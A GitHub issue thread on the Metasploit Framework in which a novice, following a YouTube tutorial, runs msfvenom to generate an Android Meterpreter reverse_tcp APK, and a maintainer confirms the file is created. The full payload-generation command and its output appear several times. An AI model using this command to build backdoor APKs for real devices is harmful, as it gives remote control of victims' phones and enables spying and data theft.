### ISSUE TITLE
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168. LPORT=8080 > blabla.apk  [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10232 bytes

### ISSUE THREAD

**Issue by KeiIsSuck** [rapid7/metasploit-framework#19097]
┌──(root㉿kali-raspberry-pi)-[/home/kali]
└─# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168. LPORT=8080 > blabla.apk   

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10232 bytes

**I just followed someone's instructions on YouTube** hehe😅

**Comment by KeiIsSuck** [comment]
I can't even do anything with my Kali Linux ;( 

everything I do always fails

**Comment by bcoles** [comment]
Was the file created?

```
ls -la blabla.apk
```

[2024-04-09 12:25:05] root@kali:~/Desktop/metasploit-framework# ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=8080 > blabla.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.1.0/stringio.so: warning: already initialized constant StringIO::VERSION
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10243 bytes

[2024-04-09 12:25:26] root@kali:~/Desktop/metasploit-framework# file blabla.apk 
blabla.apk: Android package (APK), with AndroidManifest.xml
[2024-04-09 12:25:28] root@kali:~/Desktop/metasploit-framework# ls -la blabla.apk 
-rw-r--r-- 1 root root 10243 Apr  9 12:25 blabla.apk
[2024-04-09 12:25:30] root@kali:~/Desktop/metasploit-framework#

**Comment by KeiIsSuck** [comment]
> Was the file created?
> 
> ```
> ls -la blabla.apk
> ```
> 
> ```
> [2024-04-09 12:25:05] root@kali:~/Desktop/metasploit-framework# ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=8080 > blabla.apk
> Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
> /usr/lib/x86_64-linux-gnu/ruby/3.1.0/stringio.so: warning: already initialized constant StringIO::VERSION
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> No encoder specified, outputting raw payload
> Payload size: 10243 bytes
> 
> [2024-04-09 12:25:26] root@kali:~/Desktop/metasploit-framework# file blabla.apk 
> blabla.apk: Android package (APK), with AndroidManifest.xml
> [2024-04-09 12:25:28] root@kali:~/Desktop/metasploit-framework# ls -la blabla.apk 
> -rw-r--r-- 1 root root 10243 Apr  9 12:25 blabla.apk
> [2024-04-09 12:25:30] root@kali:~/Desktop/metasploit-framework# 
> ```

i think nope

**Comment by KeiIsSuck** [comment]
oh the apk is created

**Comment by KeiIsSuck** [comment]
> Was the file created?
> 
> ```
> ls -la blabla.apk
> ```
> 
> ```
> [2024-04-09 12:25:05] root@kali:~/Desktop/metasploit-framework# ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=8080 > blabla.apk
> Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
> /usr/lib/x86_64-linux-gnu/ruby/3.1.0/stringio.so: warning: already initialized constant StringIO::VERSION
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> No encoder specified, outputting raw payload
> Payload size: 10243 bytes
> 
> [2024-04-09 12:25:26] root@kali:~/Desktop/metasploit-framework# file blabla.apk 
> blabla.apk: Android package (APK), with AndroidManifest.xml
> [2024-04-09 12:25:28] root@kali:~/Desktop/metasploit-framework# ls -la blabla.apk 
> -rw-r--r-- 1 root root 10243 Apr  9 12:25 blabla.apk
> [2024-04-09 12:25:30] root@kali:~/Desktop/metasploit-framework# 
> ```

yes, the apk is created

**Comment by KeiIsSuck** [comment]
so does it work?
